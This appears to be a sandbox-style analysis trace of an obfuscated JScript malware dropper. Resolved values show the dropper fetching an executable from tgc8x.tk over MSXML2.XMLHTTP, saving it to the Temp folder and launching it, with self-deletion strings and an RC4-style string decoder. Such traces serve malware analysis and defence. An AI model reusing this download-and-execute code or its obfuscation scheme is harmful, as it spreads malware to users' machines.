                                                                                                                                                                                                                                          • parseInt("995898DfgeKn") ➔ 995898
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ "1123059fOWHRS"
                                                                                                                                                                                                                                          • parseInt("1123059fOWHRS") ➔ 1123059
                                                                                                                                                                                                                                          • _0x1c3e(140) ➔ "1268392teACcP"
                                                                                                                                                                                                                                          • parseInt("1268392teACcP") ➔ 1268392
                                                                                                                                                                                                                                          • _0x1c3e(134) ➔ "5QEmMYO"
                                                                                                                                                                                                                                          • parseInt("5QEmMYO") ➔ 5
                                                                                                                                                                                                                                          • _0x16324c(226) ➔ "4(*W"
                                                                                                                                                                                                                                          • _0x3b90fe(129,"4(*W") ➔ "428748eDivLq"
                                                                                                                                                                                                                                          • parseInt("428748eDivLq") ➔ 428748
                                                                                                                                                                                                                                          • _0x3b90fe(145,"mh&D") ➔ "42NTWCLY"
                                                                                                                                                                                                                                          • parseInt("42NTWCLY") ➔ 42
                                                                                                                                                                                                                                          • _0x1c3e(138) ➔ "76392yWuOtG"
                                                                                                                                                                                                                                          • parseInt("76392yWuOtG") ➔ 76392
                                                                                                                                                                                                                                          • _0x1c3e(128) ➔ "279BGVghm"
                                                                                                                                                                                                                                          • parseInt("279BGVghm") ➔ 279
                                                                                                                                                                                                                                          • _0x16324c(221) ➔ "vUkl"
                                                                                                                                                                                                                                          • _0x3b90fe(137,"vUkl") ➔ "17855830DsYtJo"
                                                                                                                                                                                                                                          • parseInt("17855830DsYtJo") ➔ 17855830
                                                                                                                                                                                                                                          if ( _0x10039f === _0x374a29 )
                                                                                                                                                                                                                                            break ;
                                                                                                                                                                                                                                              else
                                                                                                                                                                                                                                                _0x2e4578[_0x16324c ( 0x101 ) ] ( _0x2e4578[_0x16324c ( 0xd6 ) ] ( ) );
                                                                                                                                                                                                                                                  }
                                                                                                                                                                                                                                                    catch ( _0x341c60 )
                                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                                        _0x2e4578['push'] ( _0x2e4578[_0x16324c ( 0xd6 ) ] ( ) );
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                            } ( _0x4a61, 0x40b34 ) );
                                                                                                                                                                                                                                                              var pOut = new ActiveXObject ( _0x115fc7 ( 0x83 ) ) [_0x155c25 ( 0x72, 'BQ9o' ) ] ( 0x2 ) + _0x115fc7 ( 0x8e ), Object = WScript[_0x155c25 ( 0x82, _0x56566c ( 0xe1 ) ) ] ( _0x115fc7 ( 0x87 ) );
                                                                                                                                                                                                                                                              • _0x1c3e(131) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                              • _0x155c25(114,"BQ9o") ➔ "GetSpecialFolder"
                                                                                                                                                                                                                                                              • GetSpecialFolder(2) ➔ C:\Users\engineer\AppData\Local\Temp
                                                                                                                                                                                                                                                              • _0x1c3e(142) ➔ "\VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                                                              • _0x56566c(225) ➔ "Bhsp"
                                                                                                                                                                                                                                                              • _0x155c25(130,"Bhsp") ➔ "CreateObject"
                                                                                                                                                                                                                                                              • _0x1c3e(135) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                              • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                                                                                                                                                              Object[_0x115fc7 ( 0x75 ) ] ( _0x155c25 ( 0x8b, 'QaXE' ), _0x115fc7 ( 0x84 ), ! [] ), Object[_0x115fc7 ( 0x74 ) ] ( );
                                                                                                                                                                                                                                                              • _0x1c3e(117) ➔ "Open"
                                                                                                                                                                                                                                                              • _0x155c25(139,"QaXE") ➔ "GET"
                                                                                                                                                                                                                                                              • _0x115fc7(132) ➔ "https://tgc8x.tk/tt/VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                                                              • Open("GET","https://tgc8x.tk/tt/VNZVNCXKKJSF.exe",false) ➔ undefined
                                                                                                                                                                                                                                                              • _0x115fc7(116) ➔ "Send"
                                                                                                                                                                                                                                                              • Send() ➔ undefined
                                                                                                                                                                                                                                                              function _0x5b6c(_0x573185, _0x30822b) {
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
                                                                                                                                                                                                                                                              • _0x5b6c(123,"RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
                                                                                                                                                                                                                                                              • _0x5b6c(141,"W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
                                                                                                                                                                                                                                                              • _0x5b6c(129,"4(*W") ➔ undefined
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
                                                                                                                                                                                                                                                              • _0x5b6c(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                              var _0x3d4abd = _0x4a61 ( );
                                                                                                                                                                                                                                                              • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                                              return _0x5b6c =
                                                                                                                                                                                                                                                                function (_0x10ff05, _0x54c045) {
                                                                                                                                                                                                                                                                var _0x21482c = _0x5099, _0x562b2c = _0xe99d;
                                                                                                                                                                                                                                                                  _0x10ff05 = _0x10ff05 - 0x6e;
                                                                                                                                                                                                                                                                    var _0x325444 = _0x3d4abd[_0x10ff05];
                                                                                                                                                                                                                                                                      if ( _0x5b6c[_0x562b2c ( 0xe3 ) ] === undefined )
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                                                        var _0x1c1988 = function (_0x985f2d) {
                                                                                                                                                                                                                                                                        • _0x1c1988("279BGVghm") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("vcFcV8kjWRZdHmk4WROea0xcUa") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8"
                                                                                                                                                                                                                                                                        • _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                        • _0x1c1988("W4BcLCo0oJRcS8kdW4SaWO1/WQaN") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'"
                                                                                                                                                                                                                                                                        • _0x1c1988("Type") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                        • _0x1c1988("Scripting.FileSystemObject") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("Scripting.FileSystemObject") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("995898DfgeKn") ➔ undefined
                                                                                                                                                                                                                                                                        var _0x14c45f = _0x5099, _0x1315bc = _0x562b2c, _0x2441a2 = _0x1315bc ( 0xd2 ), _0x5162e5 = '', _0x2d3365 = '';
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        106
                                                                                                                                                                                                                                                                        for ( var _0xc99301 = 0x0, _0x2a3829, _0x20589b, _0x13f1ea = 0x0 ; _0x20589b = _0x985f2d[_0x14c45f ( 0xfb, 'cLA8' ) ] ( _0x13f1ea ++ ) ; ~ _0x20589b && ( _0x2a3829 = _0xc99301 % 0x4 ? _0x2a3829 * 0x40 + _0x20589b : _0x20589b, _0xc99301 ++ % 0x4 ) ? _0x5162e5 += String[_0x1315bc ( 0xdc ) ] ( 0xff & _0x2a3829 >> ( - 0x2 * _0xc99301 & 0x6 ) ) : 0x0 )
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        107
                                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                                          108
                                                                                                                                                                                                                                                                          _0x20589b = _0x2441a2['indexOf'] ( _0x20589b );
                                                                                                                                                                                                                                                                            109
                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                              110
                                                                                                                                                                                                                                                                              for ( var _0x52a501 = 0x0, _0xd68c99 = _0x5162e5[_0x1315bc ( 0xdf ) ] ; _0x52a501 < _0xd68c99 ; _0x52a501 ++ )
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              111
                                                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                                                112
                                                                                                                                                                                                                                                                                _0x2d3365 += '%' + ( '00' + _0x5162e5[_0x1315bc ( 0x100 ) ] ( _0x52a501 ) [_0x1315bc ( 0xc8 ) ] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                113
                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                  114
                                                                                                                                                                                                                                                                                  return decodeURIComponent ( _0x2d3365 );
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%db%bf%5b%82%f1%87") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%54%27%c2%bf%c2%89%c2%bc%c3%84%c2%b8%c2%ba%04%03%45%c2%b8") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8"
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%c3%86%c2%95%c3%b4%3a%3a%c2%b3%c2%83%c3%8b%00%c2%8d%7f%c2%a0%27") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'"
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%b5%83%c4") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%b0%24%48%3d%32%0d%19%f2%0b%12%c6%12%4c%43%28%04%91%02") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%b0%24%48%3d%32%0d%19%f2%0b%12%c6%12%4c%43%28%04%91%02") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%1d%34%cf%4b%ff%d3%18%2f%17%4c%af%d3%4f%fb%e7%ce%f9%dc%c6%49%23%b1%f1%17") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%f7%de%7c%f7%c7%45%18%49%0d") ➔ undefined
                                                                                                                                                                                                                                                                                  115
                                                                                                                                                                                                                                                                                  },
                                                                                                                                                                                                                                                                                    116
                                                                                                                                                                                                                                                                                    _0x229c24 = function (_0x29b9bf, _0x8f1407) {
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("279BGVghm","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("vcFcV8kjWRZdHmk4WROea0xcUa","m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
• function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
• function (_0x10ff05, _0x54c045).AOWVVX("W4BcLCo0oJRcS8kdW4SaWO1/WQaN","W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
• function (_0x10ff05, _0x54c045).AOWVVX("Type","4(*W") ➔ undefined
• function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
• function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","RY1%") ➔ undefined
• function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","m*X5") ➔ undefined
• function (_0x10ff05, _0x54c045).AOWVVX("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","m*X5") ➔ undefined
• function (_0x10ff05, _0x54c045).AOWVVX("995898DfgeKn","m*X5") ➔ undefined
var _0x4eb5d1 = _0x562b2c, _0x3fff08 = _0x5099, _0x540d16 = [], _0x7b0d9d = 0x0, _0x582129, _0x19cf9c = '';
_0x29b9bf = _0x1c1988 ( _0x29b9bf );
• _0x1c1988("279BGVghm") ➔ undefined
• _0x1c1988("vcFcV8kjWRZdHmk4WROea0xcUa") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8"
• _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
• _0x1c1988("W4BcLCo0oJRcS8kdW4SaWO1/WQaN") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'"
• _0x1c1988("Type") ➔ undefined
• _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
• _0x1c1988("Scripting.FileSystemObject") ➔ undefined
• _0x1c1988("Scripting.FileSystemObject") ➔ undefined
• _0x1c1988("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined
• _0x1c1988("995898DfgeKn") ➔ undefined
var _0x249fdc;
for ( _0x249fdc = 0x0 ; _0x249fdc < 0x100 ; _0x249fdc ++ )
{
  _0x540d16[_0x249fdc] = _0x249fdc;
}
for ( _0x249fdc = 0x0 ; _0x249fdc < 0x100 ; _0x249fdc ++ )
{
  _0x7b0d9d = ( _0x7b0d9d + _0x540d16[_0x249fdc] + _0x8f1407[_0x3fff08 ( 0xf8, 'dX[e' ) ] ( _0x249fdc % _0x8f1407[_0x4eb5d1 ( 0xdf ) ] ) ) % 0x100, _0x582129 = _0x540d16[_0x249fdc], _0x540d16[_0x249fdc] = _0x540d16[_0x7b0d9d], _0x540d16[_0x7b0d9d] = _0x582129;
  • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
  • _0x4eb5d1(223) ➔ "length"
}
_0x249fdc = 0x0, _0x7b0d9d = 0x0;
for ( var _0x287833 = 0x0 ; _0x287833 < _0x29b9bf[_0x3fff08 ( 0xd4, 'Uvs9' ) ] ; _0x287833 ++ )
• _0x3fff08(212,"Uvs9") ➔ "length"
{
  _0x249fdc = ( _0x249fdc + 0x1 ) % 0x100, _0x7b0d9d = ( _0x7b0d9d + _0x540d16[_0x249fdc] ) % 0x100, _0x582129 = _0x540d16[_0x249fdc], _0x540d16[_0x249fdc] = _0x540d16[_0x7b0d9d], _0x540d16[_0x7b0d9d] = _0x582129, _0x19cf9c += String[_0x3fff08 ( 0xcc, 'pkRk' ) ] ( _0x29b9bf[_0x4eb5d1 ( 0x100 ) ] ( _0x287833 ) ^ _0x540d16[( _0x540d16[_0x249fdc] + _0x540d16[_0x7b0d9d] ) % 0x100] );
  • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
  • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          132
                                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                                            133
                                                                                                                                                                                                                                                                                                            return _0x19cf9c;
                                                                                                                                                                                                                                                                                                              134
                                                                                                                                                                                                                                                                                                              };
                                                                                                                                                                                                                                                                                                                _0x5b6c['AOWVVX'] = _0x229c24, _0x573185 = arguments, _0x5b6c[_0x21482c ( 0xe4, 'Uvs9' ) ] = ! ! [];
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                                                  var _0x5f031d = _0x3d4abd[0x0], _0x41a554 = _0x10ff05 + _0x5f031d, _0x465855 = _0x573185[_0x41a554];
                                                                                                                                                                                                                                                                                                                    return ! _0x465855 ? ( _0x5b6c[_0x562b2c ( 0xd0 ) ] === undefined && ( _0x5b6c['RzXUsr'] = ! ! [] ), _0x325444 = _0x5b6c[_0x21482c ( 0x108, 'oE&(' ) ] ( _0x325444, _0x54c045 ), _0x573185[_0x41a554] = _0x325444 ) : _0x325444 = _0x465855, _0x325444;
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("279BGVghm","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("vcFcV8kjWRZdHmk4WROea0xcUa","m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("W4BcLCo0oJRcS8kdW4SaWO1/WQaN","W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Type","4(*W") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","RY1%") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("995898DfgeKn","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                                                    }, _0x5b6c ( _0x573185, _0x30822b );
                                                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                                                        function _0xe99d(_0x304024, _0x5125dd) {
                                                                                                                                                                                                                                                                                                                        • _0xe99d(234) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(260) ➔ "push"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(234) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(260) ➔ "76392yWuOtG"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(233) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(234) ➔ "421620Dulpsf"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(260) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(233) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(234) ➔ "282elZIVv"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(260) ➔ "5991OPUtAM"
                                                                                                                                                                                                                                                                                                                        var _0x3974d = _0x3974 ( );
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
